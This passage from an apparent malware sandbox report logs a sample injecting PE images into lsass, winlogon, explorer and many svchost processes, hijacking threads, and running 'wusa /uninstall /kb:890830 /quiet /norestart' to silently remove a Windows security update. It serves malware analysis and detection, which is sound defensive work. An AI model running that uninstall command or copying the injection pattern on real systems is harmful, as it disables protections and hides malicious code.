          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DC90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBFA540000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 3340000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844140000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 228CA7E0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 228B3E20000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1EDA6AC0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 15519600000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 185BB560000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 17F327F0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 197F36A0000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1C019C80000 value starts with: 4D5A
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1C01A710000 value starts with: 4D5A
          Injects code into the Windows Explorer (explorer.exe)
          Source: C:\Windows\System32\dialer.exeMemory written: PID: 1028 base: 3340000 value: 4D
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeThread register set: target process: 1276Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeThread register set: target process: 7056Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeThread register set: target process: 2284Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeThread register set: target process: 4508Jump to behavior
          Writes to foreign memory regions
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E858950000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140ADFC0000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DD590000Jump to behavior
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160C9E0000Jump to behavior
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DD00000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 1E8589B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 140AE890000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195DE1A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1160CA10000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257E1070000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F28C1D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CA97FD0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2652E0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 254A27A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24B87DA0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 205FB3C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A205670000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18EC1F30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25CE3BC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26238950000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2786E560000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1611FF70000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C0F350000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B279570000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E70A460000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22D13110000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C8C580000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2825F1D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AA5D9C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20BAEC90000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2DC1B0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1C782530000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: A60000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24066EB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A3FD9A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 181CEDB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A142790000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 195B6F30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1428DC90000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1B973730000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DBFA540000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D76CCC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A239D90000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 17CFA390000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23FB7270000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DF53B50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 164E88A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 25177B50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28D5D340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 24EB5E10000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20859990000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F153C20000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D241D40000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 16FADAD0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 20E03070000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15204DB0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 3340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 175C5280000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1CE76AA0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22EF1B30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1C7F34F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 261DE4D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 22E74520000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1B1A9D00000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 217AF8C0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 226D8930000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 13E5E930000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F844140000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21197E30000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 223DC870000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1B4698D0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27234C50000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28543540000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\audiodg.exe base: 2B684340000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1BE58920000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 228CA7E0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 228B3E20000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1EDA6AC0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 15519600000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 185BB560000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 17F327F0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 197F36A0000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1C019C80000
          Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1C01A710000
          Source: C:\Users\user\Desktop\nW2oopMIdg.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,25_2_0000000140001B54
          Source: C:\Windows\System32\dialer.exeCode function: 25_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,25_2_0000000140001B54
          Source: winlogon.exe, 0000001F.00000000.2071908099.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.3286399434.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000000.2084584090.0000011605AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: winlogon.exe, 0000001F.00000000.2071908099.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.3286399434.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000002.3296482195.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: winlogon.exe, 0000001F.00000000.2071908099.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.3286399434.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000002.3296482195.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: winlogon.exe, 0000001F.00000000.2071908099.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000001F.00000002.3286399434.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000029.00000002.3296482195.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\winlogon.exeCode function: 31_2_000001E8589636F0 cpuid 31_2_000001E8589636F0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
